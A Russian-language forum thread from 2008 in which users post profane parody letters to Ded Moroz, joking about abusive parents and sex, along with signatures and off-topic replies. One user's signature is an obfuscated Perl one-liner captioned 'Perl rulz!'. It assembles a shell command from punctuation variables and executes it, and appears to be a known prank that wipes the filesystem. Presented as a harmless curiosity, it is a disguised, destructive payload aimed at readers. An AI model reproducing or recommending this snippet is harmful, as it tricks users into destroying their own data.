И тогда Лёха меня убьёт...Не надо! _________________ Жаркая пустыня Дагестана.За высоким барханом лежит труп.Это мой,мой,мой труп лежит.Из свежей раны течёт кровь.Это моя,моя,моя кровь течёт.И в жаркой пустыне Дагестана за высоким барханом чей-то труп знакомый валяется!Это мой труп!Нет.Это твой труп?Нет.Это наш труп!И из ещё дымящейся раны течёт алая кровь.
Добавлено: Вт Фев 26, 2008 12:15 am Заголовок сообщения:
Здравствуй Дедушка Мороз ! Меня зовут Маша. Мне 15 лет ! Не много не мало, но я верю и надеюсь в то, что ты есть и сейчас читаешь моё письмо. Моя мама очень злая тётя. Она не разрешает писать мне письма тебе, и поэтому я сижу в в себе и пишу это письмо. Мама выпускает меня гулять только до в 12. Когда я её не слушаюсь, она бросает в меня стул и частенько попадает мне прямо в попу =( Однажды я не вытерпела и сказала ей: "фак". Мой папа работает учусем и приходя с работы с плохим настроением, он кричит: "блядь" !!! И заставляет меня готовить ему хз. Но я не умею готовить, и поэтому у меня получаецца говно. Он злицца ещё сильнее, и запрещает мне играть в летели дракончики с друзьями. Ещё папа придумал мне кличку, и зовёт меня не Маша, а Верта, Зента ! В общем, дедушка мороз, если ты не я, то ты поймёшь как мне плохо. Дорогой Дедушка мороз - красная занавеска забери меня к себе или вышли мне стул. Ещё сделай так, что бы близкие мне люди любили меня и почаще давали мне денег на поспать. Любимый дед мороз, ты мой последний шанс. Я надеюсь на новый год я найду под ёлочкой спакойствия. Дед Мороз, пойми как мне плохо. Если ты не прочтёшь это письмо или оно не дойдёт до тебя, мне здохнет бедняжка. Помни что я верю в тебя сука !
Деду Морозу ! Маша _________________ М.И.Р.С.
Добавлено: Вс Мар 02, 2008 12:42 pm Заголовок сообщения:
Здравствуй Дедушка Мороз ! Меня зовут Crazy. Мне 16 лет ! Не много не мало, но я верю и надеюсь в то, что ты есть и сейчас читаешь моё письмо. Моя мама очень злая тётя. Она не разрешает писать мне письма тебе, и поэтому я сижу в в горящем танке и пишу это письмо. Мама выпускает меня гулять только до 02. Когда я её не слушаюсь, она бросает в меня нож и частенько попадает мне прямо в руку =( Однажды я не вытерпел и сказал ей: "иди нахуй". Мой папа работает техником и приходя с работы с плохим настроением, он кричит: "бля сука иди нахуй" И заставляет меня чинить его ручку. Но я не умею ничего ремонтировать, и поэтому у меня получается дерьмо. Он злится ещё сильнее, и запрещает мне играть в прятки с друзьями. Ещё папа придумал мне кличку, и зовёт меня не Crazy, а Кад ! Это очень обидно. В общем, дедушка мороз, если ты не уебак, то ты поймёшь как мне плоха. Дорогой Дедушка мороз - красная кровь забери меня к себе или вышли мне нож. Ещё сделай так, что бы близкие мне люди любили меня и почаще давали мне денег на попокушать. Любимый дед мороз, ты мой последний шанс. Я надеюсь на новый год я найду под ёлочкой дробовику. Дед Мороз, пойми как мне плоха. Если ты не прочтёшь это письмо или оно не дойдёт до тебя, мне умрет. Помни что я верю в тебя пидар ебаный !
Добавлено: Пн Апр 21, 2008 12:58 am Заголовок сообщения:
Здравствуй Дедушка Мороз ! Меня зовут сучка. Мне 17 с половиной лет ! Не много не мало, но я верю и надеюсь в то, что ты есть и сейчас читаешь моё письмо. Моя мама очень злая тётя. Она не разрешает писать мне письма тебе, и поэтому я сижу в церкове и пишу это письмо. Мама выпускает меня гулять только до не помню. Когда я её не слушаюсь, она бросает в меня мужчина и частенько попадает мне прямо в длинные пальцы) =( Однажды я не вытерпела и сказала ей: "любая фраза". Мой папа работает дерьматологом и приходя с работы с плохим настроением, он кричит: "ну хз... редиска?" !!! И заставляет меня готовить ему хуй на блюдце. Но я не умею готовить, и поэтому у меня получаецца колбаса. Он злицца ещё сильнее, и запрещает мне играть в 21 на раздевание с друзьями. Ещё папа придумал мне кличку, и зовёт меня не сучка, а цербер ! В общем, дедушка мороз, если ты не лёша, то ты поймёшь как мне не знаю. Дорогой Дедушка мороз - красный лена головач забери меня к себе или вышли мне мужчина. Ещё сделай так, что бы близкие мне люди любили меня и почаще давали мне денег на секоса нехватает). Любимый дед мороз, ты мой последний шанс. Я надеюсь на новый год я найду под ёлочкой мужчину. Дед Мороз, пойми как мне не знаю. Если ты не прочтёшь это письмо или оно не дойдёт до тебя, мне пиздец. Помни что я верю в тебя предатель !
Добавлено: Вс Май 18, 2008 12:58 am Заголовок сообщения:
WodkaGT
мы с Аней точно туда) _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
$!=~/(.)(.).(.)(.)(.)(.)..(.)(.)(.)..(.)......(.)/,$"),$=++;$.++;$.++;
$_++;$_++;($_,$\,$,)=($~.$"."$;$/$%[$?]$_$\$,$:$%[$?]",$"&$~,$#,);$,++
;$,++;$^|=$";`$_$\$,$/$:$;$~$*$%[$?]$.$~$*${#}$%[$?]$;$\$"$^$~$*.>&$=`
Perl rulz!
Добавлено: Пн Май 19, 2008 7:03 pm Заголовок сообщения:
А я не в теме,о чём речь? _________________ Жаркая пустыня Дагестана.За высоким барханом лежит труп.Это мой,мой,мой труп лежит.Из свежей раны течёт кровь.Это моя,моя,моя кровь течёт.И в жаркой пустыне Дагестана за высоким барханом чей-то труп знакомый валяется!Это мой труп!Нет.Это твой труп?Нет.Это наш труп!И из ещё дымящейся раны течёт алая кровь.
блин ссылка не такая как надо,она должна была быть на конкретный тест,видимо я как-то по-левому скорпировала _________________ "We accept her! We accept her! One of us! One of us! Gooble gobble, gooble gobble!"